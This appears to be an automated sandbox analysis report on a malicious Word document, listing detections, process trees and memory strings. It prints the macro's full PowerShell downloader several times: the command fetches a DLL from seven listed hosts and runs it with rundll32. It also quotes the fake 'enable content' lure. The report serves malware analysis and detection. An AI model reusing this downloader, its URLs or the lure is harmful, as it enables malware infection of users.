
Windows Analysis Report 704.doc

Overview

General Information

Sample Name: 704.doc
Analysis ID: 526268
MD5: 40f85d07da2533d576b1f2d7c043a2da
SHA1: 60b84d70a6511483c6de131fb62e30a99edff5c4
SHA256: d05ec2a0134518ec74fcbee94a522c3837d82b7b5d2f162b8466850fc4f1be0d

Most interesting Screenshot:

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus detection for URL or domain
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Obfuscated command line found
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Suspicious powershell command line found
Machine Learning detection for sample
Document contains no OLE stream with summary information
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to detect virtual machines (SLDT)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1220 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 2420 cmdline: "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2776 cmdline: powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP | SUSP_VBA_FileSystem_Access | Detects suspicious VBA that writes to disk and is activated on document open | Florian Roth
  • 0xafc8:$s1: \Common Files\Microsoft Shared\
  • 0xb320:$s1: \Common Files\Microsoft Shared\
  • 0x4447:$s2: Scripting.FileSystemObject
  • 0x557e:$a1: Document_Open
  • 0xa5e7:$a1: Document_Open
  • 0xb9f6:$a1: Document_Open
  • 0xd114:$a1: Document_Open

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command / CommandLine / ProcessCommandLine: the cmd.exe command line of PID 2420 (reproduced in full in the Process Tree above), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1220, ProcessId: 2420
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Source: Process started | Author: James Pemberton / @4A616D6573 | Data: Command / CommandLine / ProcessCommandLine: the cmd.exe command line of PID 2420 (reproduced in full in the Process Tree above), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1220, ProcessId: 2420
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command / CommandLine / ProcessCommandLine: the powershell.exe command line of PID 2776 (reproduced in full in the Process Tree above), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: the cmd.exe command line of PID 2420 (Process Tree above), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2420

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://ckfoods.net/wp-admin/wPInm2rgMu/ | Avira URL Cloud: Label: malware
Source: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/ | Avira URL Cloud: Label: malware
Source: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/ | Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: 704.doc | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | String found in binary or memory: http://adorwelding.zmo
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | String found in binary or memory: http://adorwelding.zmotp
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | String found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBW
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | String found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | String found in binary or memory: http://ckfoods.net/wp-admin/wP
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | String found in binary or memory: http://ckfoods.net/wp-admin/wPInm2rgMu/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | String found in binary or memory: http://huskysb.com/wordpre
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp | String found in binary or memory: http://huskysb.com/wordpress/6f0qIQ
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | String found in binary or memory: http://huskysb.com/wordpress/6f0qIQlWPaYDfa/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | String found in binary or memory: http://manak.edunetf
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | String found in binary or memory: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | String found in binary or memory: http://primtalent.com/wp-admin/9
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | String found in binary or memory: http://primtalent.com/wp-admin/9yt1u/
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | String found in binary or memory: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/
Source: powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp | String found in binary or memory: http://server.zmotpro.com/venkat/
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp | String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/P
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PE
Source: powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{58F32F91-EE55-4449-B0B3-F02D5B2E95D2}.tmp

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
Source: Screenshot number: 4 | Screenshot OCR: DOCUMENT IS PROTECTED. i Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 0 N@m 13 ;a 10096 G)
Source: Screenshot number: 8 | Screenshot OCR: ENABLE EDITING" and "ENABLE@TENT" buttons to pcenew INS Document O CI D O Page, 1 of 1 I Wo
Source: Screenshot number: 8 | Screenshot OCR: DOCUMENT IS PROTECTED Prenewmg os not available for procecled documents CI You have to press "ENAB
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 12 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 10
Source: Screenshot number: 12 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 100% G) A GE)
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Source: ~DF59F33552EDE7EF7C.TMP.0.dr | Stream path 'VBA/cvbku3gakuisdgfilu3gblaw' : found possibly 'ADODB.Stream' functions open, read, write
Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation | OLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function fjow3efyw98efhasdokfhlnkvawofh3, API Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer) | Name: fjow3efyw98efhasdokfhlnkvawofh3
Source: ~DF59F33552EDE7EF7C.TMP.0.dr | OLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)
Source: 704.doc | OLE indicator has summary info: false
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr | OLE indicator has summary info: false
Source: ~DF59F33552EDE7EF7C.TMP.0.dr | OLE indicator has summary info: false
Source: C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP, type: DROPPED | Matched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
Source: 704.doc | OLE indicator application name: unknown
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr | OLE indicator application name: unknown
Source: ~DF59F33552EDE7EF7C.TMP.0.dr | OLE indicator application name: unknown
Source: 704.doc | OLE, VBA macro line: Private Sub Document_Open(): Dim gzjohestiha4otihsdoa8ef As String
Source: VBA code instrumentation | OLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function Document_Open | Name: Document_Open
Source: ~DF59F33552EDE7EF7C.TMP.0.dr | OLE, VBA macro line: Private Sub Document_Open()
Source: 704.doc | OLE indicator, VBA macros: true
Source: ~DF59F33552EDE7EF7C.TMP.0.dr | OLE indicator, VBA macros: true
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF59F33552EDE7EF7C.TMP.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....H.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v....X.......0.b.............H.T.....$.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............:T.k......T...............7.............}..v....X.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............:T.k......T...............7.............}..v....X.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............:T.k......T...............7.............}..v....X.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............:T.k......T...............7.............}..v....X.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............:T.k......T...............7.............}..v....X.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............:T.k......T...............7.............}..v....X.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............:T.k......T...............7.............}..v....X.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............:T.k......T...............7.............}..v....X.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....8.......0.b.............H.T.....4.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....p ......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.....................l.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....h&................7.............}..v.....&......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......:T.k......T...............7.............}..v....x*......0.b.............H.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....0+................7.............}..v.....+......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....h&................7.............}..v.....&......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....-......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....h.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....P4......0.b.....................~.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....5................7.............}..v.....5......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v.....9......0.b.............H.T.....$.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....P:................7.............}..v.....:......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....A......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....PB................7.............}..v.....B......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....I......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....PJ................7.............}..v.....J......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....Q......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....PR................7.............}..v.....R......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....Y......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....PZ................7.............}..v.....Z......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............:T.k......T...............7.............}..v.....a......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............ZU.k....Pb................7.............}..v.....b......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............:T.k......T...............7.............}..v.....i......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............ZU.k....Pj................7.............}..v.....j......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............:T.k......T...............7.............}..v.....q......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............ZU.k....Pr................7.............}..v.....r......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............:T.k......T...............7.............}..v.....y......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............ZU.k....Pz................7.............}..v.....z......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[.......e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............ZU.k......................7.............}..v....H.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............ZU.k......................7.............}..v....H.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....x.......0.b.............H.T.....4.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............ZU.k....0.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................l.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......:T.k......T...............7.............}..v............0.b.............H.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....p.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v.... .......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v.... .......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................~.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.b..............................A}..... .........7.............}..v............ .................T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............Jump to behavior
